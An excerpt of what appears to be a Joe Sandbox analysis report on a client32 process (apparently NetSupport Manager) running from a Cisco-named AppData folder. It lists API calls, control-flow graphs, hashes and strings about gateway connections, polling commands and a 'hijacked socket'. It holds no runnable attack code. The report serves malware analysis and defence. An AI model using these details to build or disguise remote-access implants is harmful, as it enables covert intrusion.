                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029839
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1102984A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ErrorLast$FreeInternetLibrary$ConnectHeapLoadOpen
                                                                                                                                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                                                                                    • API String ID: 559841761-913974648
                                                                                                                                                                                                    • Opcode ID: f0a7ced98914972633a1eee175ea7a09d2b935fb3fa3e8955538528996497896
                                                                                                                                                                                                    • Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0a7ced98914972633a1eee175ea7a09d2b935fb3fa3e8955538528996497896
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 893 689c7030-689c7050 call 689b2a90 call 689cdbd0 898 689c7097 893->898 899 689c7052-689c7095 LoadLibraryA 893->899 900 689c7099-689c70f8 call 689b8d00 InitializeCriticalSection CreateEventA 898->900 899->900 903 689c70fa-689c710e call 689b6f50 900->903 904 689c7111-689c711e CreateEventA 900->904 903->904 906 689c7137-689c7144 CreateEventA 904->906 907 689c7120-689c7134 call 689b6f50 904->907 910 689c715d-689c7170 WSAStartup 906->910 911 689c7146-689c715a call 689b6f50 906->911 907->906 912 689c7172-689c7182 call 689b5290 call 689b2b70 910->912 913 689c7183-689c71b2 call 689d1b69 910->913 911->910 922 689c71b4-689c71cd call 689b6f50 913->922 923 689c71d0-689c71e4 call 689d1c50 913->923 922->923 929 689c71fa-689c7202 923->929 930 689c71e6-689c71e9 923->930 931 689c7209-689c7223 call 689d3753 929->931 932 689c7204 929->932 930->929 933 689c71eb-689c71f1 930->933 937 689c723c-689c7255 call 689c9bf0 931->937 938 689c7225-689c7239 call 689b6f50 931->938 932->931 933->929 934 689c71f3-689c71f8 933->934 934->931 943 689c726a-689c7271 call 689b5730 937->943 944 689c7257-689c725e 937->944 938->937 948 689c730b-689c7310 943->948 949 689c7277-689c729a call 689d1b69 943->949 945 689c7260-689c7268 944->945 945->943 945->945 950 689c731e-689c7336 call 689b5e90 call 689b5530 948->950 951 689c7312-689c7315 948->951 957 689c729c-689c72bb call 689b6f50 949->957 958 689c72be-689c72dc call 689d1c50 call 689d1b69 949->958 956 689c7339-689c7354 call 689b5e90 950->956 951->950 954 689c7317-689c731c 951->954 954->950 954->956 969 689c7356-689c735c 956->969 970 689c7361-689c738b GetTickCount CreateThread 956->970 957->958 977 689c72de-689c72f7 call 689b6f50 958->977 978 689c72fa-689c7308 call 689d1c50 958->978 969->970 972 689c738d-689c73a6 call 689b6f50 970->972 973 689c73a9-689c73b6 SetThreadPriority 970->973 972->973 975 689c73cf-689c73ed call 689b5f20 call 689b5e90 973->975 976 689c73b8-689c73cc call 689b6f50 973->976 990 689c73ef 975->990 991 689c73f5-689c73f7 975->991 976->975 977->978 978->948 990->991 992 689c73f9-689c7407 call 689cdbd0 991->992 993 689c7425-689c7447 GetModuleFileNameA call 689b2420 991->993 998 689c741e 992->998 999 689c7409-689c741c call 689b4580 992->999 1000 689c744c 993->1000 1001 689c7449-689c744a 993->1001 1003 689c7420 998->1003 999->1003 1004 689c7451-689c746d 1000->1004 1001->1004 1003->993 1006 689c7470-689c747f 1004->1006 1006->1006 1007 689c7481-689c7486 1006->1007 1008 689c7487-689c748d 1007->1008 1008->1008 1009 689c748f-689c74c8 GetPrivateProfileIntA GetModuleHandleA 1008->1009 1010 689c74ce-689c74fa call 689b5e90 * 2 1009->1010 1011 689c7563-689c758f CreateMutexA timeBeginPeriod 1009->1011 1016 689c74fc-689c7511 call 689b5e90 1010->1016 1017 689c7536-689c755d call 689b5e90 * 2 1010->1017 1022 689c752a-689c7530 1016->1022 1023 689c7513-689c7528 call 689b5e90 1016->1023 1017->1011 1022->1017 1023->1017 1023->1022
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 689B2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 689B2ACB
                                                                                                                                                                                                      • Part of subcall function 689B2A90: wsprintfA.USER32 ref: 689B2B05
                                                                                                                                                                                                      • Part of subcall function 689CDBD0: wsprintfA.USER32 ref: 689CDC04
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll), ref: 689C7057
                                                                                                                                                                                                      • Part of subcall function 689D1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,689DD3C1,689D6E81,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7), ref: 689D1BAE
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(689FB898), ref: 689C70DF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689C70EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689C7115
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689C713B
                                                                                                                                                                                                    • WSAStartup.WSOCK32(00000101,689FB91A), ref: 689C7167
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C7361
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00004000,689C6BA0,00000000,00000000,689FBACC), ref: 689C737E
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 689C73AC
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\Support\,00000104), ref: 689C7430
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 689C74B0
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(nsmtrace), ref: 689C74C0
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 689C7566
                                                                                                                                                                                                    • timeBeginPeriod.WINMM(00000001), ref: 689C7573
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$EventModule$FileNameThreadwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTicktime
                                                                                                                                                                                                    • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$141700$C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                                                                                                    • API String ID: 4232513710-3782081147
                                                                                                                                                                                                    • Opcode ID: cb23b8b7427c9ea2c5ba863886292bd16c2de1010a99d2b851f4b360aad12953
                                                                                                                                                                                                    • Instruction ID: f57bc0e3f1c52b31c86074674d794958b5a267eee4ffac15a358dee5a3e9f8e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb23b8b7427c9ea2c5ba863886292bd16c2de1010a99d2b851f4b360aad12953
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9ED1F4B5944314AFDB189F68AD85A2E7BFCEB5A34CBC08439F419D7241D732E841CB92

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1276 689ba980-689ba9e7 call 689b5840 1279 689ba9ed-689ba9f0 1276->1279 1280 689baa9c 1276->1280 1279->1280 1282 689ba9f6-689ba9fb 1279->1282 1281 689baaa2-689baaae 1280->1281 1283 689baab0-689baac5 call 689d28e1 1281->1283 1284 689baac6-689baacd 1281->1284 1282->1280 1285 689baa01-689baa06 1282->1285 1288 689bab48-689bab58 socket 1284->1288 1289 689baacf-689baad7 1284->1289 1285->1280 1287 689baa0c-689baa21 EnterCriticalSection 1285->1287 1293 689baa89-689baa9a LeaveCriticalSection 1287->1293 1294 689baa23-689baa2b 1287->1294 1290 689bab5a-689bab6f WSAGetLastError call 689d28e1 1288->1290 1291 689bab70-689babc9 #21 * 2 call 689b5e90 1288->1291 1289->1288 1295 689baad9-689baadc 1289->1295 1305 689babcb-689babe3 #21 1291->1305 1306 689babe8-689bac1f bind 1291->1306 1293->1281 1298 689baa30-689baa39 1294->1298 1295->1288 1299 689baade-689bab05 call 689ba5c0 1295->1299 1302 689baa3b-689baa3f 1298->1302 1303 689baa49-689baa51 1298->1303 1313 689bab0b-689bab2f WSAGetLastError call 689b30a0 1299->1313 1314 689bad4a-689bad69 EnterCriticalSection 1299->1314 1302->1303 1307 689baa41-689baa47 1302->1307 1303->1298 1309 689baa53-689baa5e LeaveCriticalSection 1303->1309 1305->1306 1310 689bac41-689bac49 1306->1310 1311 689bac21-689bac40 WSAGetLastError closesocket call 689d28e1 1306->1311 1307->1303 1312 689baa60-689baa88 LeaveCriticalSection call 689d28e1 1307->1312 1309->1281 1316 689bac4b-689bac57 1310->1316 1317 689bac59-689bac64 1310->1317 1325 689bae82-689bae92 call 689d28e1 1313->1325 1328 689bab35-689bab47 call 689d28e1 1313->1328 1318 689bad6f-689bad7d 1314->1318 1319 689bae50-689bae80 LeaveCriticalSection GetTickCount InterlockedExchange 1314->1319 1324 689bac65-689bac83 htons WSASetBlockingHook call 689b7610 1316->1324 1317->1324 1326 689bad80-689bad86 1318->1326 1319->1325 1334 689bac88-689bac8d 1324->1334 1331 689bad88-689bad90 1326->1331 1332 689bad97-689bae0f InitializeCriticalSection call 689b8fb0 call 689d0ef0 1326->1332 1331->1326 1336 689bad92 1331->1336 1349 689bae18-689bae4b getsockname 1332->1349 1350 689bae11 1332->1350 1339 689bac8f-689bacc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 689b30a0 call 689d28e1 1334->1339 1340 689bacc6-689baccd 1334->1340 1336->1319 1343 689baccf-689bacd6 1340->1343 1344 689bad45 WSAUnhookBlockingHook 1340->1344 1343->1344 1348 689bacd8-689bacfb call 689ba5c0 1343->1348 1344->1314 1348->1344 1355 689bacfd-689bad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 689b30a0 1348->1355 1349->1319 1350->1349 1355->1325 1358 689bad32-689bad44 call 689d28e1 1355->1358
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 689B5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,689B8F91,00000000,00000000,689FB8DA,?,00000080), ref: 689B5852
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,?,00000000,00000000), ref: 689BAA11
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689BAA58
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689BAA68
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689BAA94
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 689BAB0B
                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 689BAB4E
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 689BAB5A
                                                                                                                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAB8E
                                                                                                                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 689BABB1
                                                                                                                                                                                                    • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 689BABE3
                                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC18
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC21
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC29
                                                                                                                                                                                                    • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC65
                                                                                                                                                                                                    • WSASetBlockingHook.WSOCK32(689B63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC76
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC8F
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC96
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAC9C
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BACFD
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAD04
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAD0A
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAD45
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689BAD4F
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-689FCB4A), ref: 689BADE6
                                                                                                                                                                                                      • Part of subcall function 689B8FB0: getsockname.WSOCK32(?,?,00000010,?,02ED2CB8,?), ref: 689B9005
                                                                                                                                                                                                    • getsockname.WSOCK32(00000000,?,?), ref: 689BAE4B
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689BAE60
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689BAE6C
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 689BAE7A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Cannot connect to gateway %s via web proxy, error %d, xrefs: 689BAD14
                                                                                                                                                                                                    • *TcpNoDelay, xrefs: 689BABB8
                                                                                                                                                                                                    • Cannot connect to gateway %s, error %d, xrefs: 689BACA6
                                                                                                                                                                                                    • Connect error to %s using hijacked socket, error %d, xrefs: 689BAB17
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTickbindhtonsinet_ntoasocket
                                                                                                                                                                                                    • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                                                                                    • API String ID: 3564155822-2561115898
                                                                                                                                                                                                    • Opcode ID: 2c3cee0dd699b4f0fb4c110663509158f74a9bdc61e7a751c103e834bf81a86f
                                                                                                                                                                                                    • Instruction ID: 11389a5f4a627005b693e3ac141a6bdc3ee47d78e99c06242b33b71d11364540
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c3cee0dd699b4f0fb4c110663509158f74a9bdc61e7a751c103e834bf81a86f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CE1C675A05214AFDB14CF54DD40BAEB3F5FF89315F8081AAE91AA7280DB70DE44CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • #16.WSOCK32(00000000,009686C7,689C3361,00000000,00000000,689C3361,00000007), ref: 689B924C
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,009686C7,689C3361,00000000,00000000,689C3361,00000007), ref: 689B925B
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689B9274
                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,00000000,009686C7,689C3361,00000000,00000000,689C3361,00000007), ref: 689B92A8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689B92B0
                                                                                                                                                                                                    • Sleep.KERNEL32(00000014), ref: 689B92BC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ReadSocket - Connection has been closed by peer, xrefs: 689B92E0
                                                                                                                                                                                                    • *RecvTimeout, xrefs: 689B927B
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 689B9226
                                                                                                                                                                                                    • ReadSocket - Error %d reading response, xrefs: 689B92F7
                                                                                                                                                                                                    • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 689B922B
                                                                                                                                                                                                    • ReadSocket - Would block, xrefs: 689B928A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountSleepTick$ErrorLast
                                                                                                                                                                                                    • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                                                                                                    • API String ID: 2495545493-2497412063
                                                                                                                                                                                                    • Opcode ID: 8260cde289928dba62eb3593d4c3dc7650e2de512bf9620eb82a021914a6067d
                                                                                                                                                                                                    • Instruction ID: 944f17b49ce192a1e971e2bd704fa99e80fc98ce0f9a47560f22cd1cad53b298
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8260cde289928dba62eb3593d4c3dc7650e2de512bf9620eb82a021914a6067d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31B179E50208AFEB00DEF8E984B9FB3F4EB66324F804469E909D7140E771E9408791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,?,?,9760354D,05C2A5B0,976034B3,FFFFFFFF,00000000), ref: 689C31E2
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,689EECB0), ref: 689C31EC
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,05C2A5B0,976034B3,FFFFFFFF,00000000), ref: 689C322A
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,689EECB0), ref: 689C3234
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,?,9760354D), ref: 689C32BE
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 689C32D3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 689C334D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread
                                                                                                                                                                                                    • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                                                                                                    • API String ID: 304757373-3441452530
                                                                                                                                                                                                    • Opcode ID: a03bfc5ece2883075dca447c95e2043ff1c975e549e0bb91803c6bbd18ff52bd
                                                                                                                                                                                                    • Instruction ID: 016a6ee3e6854979fe6ad5f05a2e4b19e2f0036d1b3440a8c1fc3093c5b74f04
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a03bfc5ece2883075dca447c95e2043ff1c975e549e0bb91803c6bbd18ff52bd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1617176904208AFCF18DFA4D984EEEB7B9FF49314F84851DE416A7241EB35E504CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(00000083,00000000,000000BC,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 11170625
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 11170677
                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 1117068A
                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 111706F4
                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,?,11161635,?,000000BC,?,00000001,00000000,00000000), ref: 11170708
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
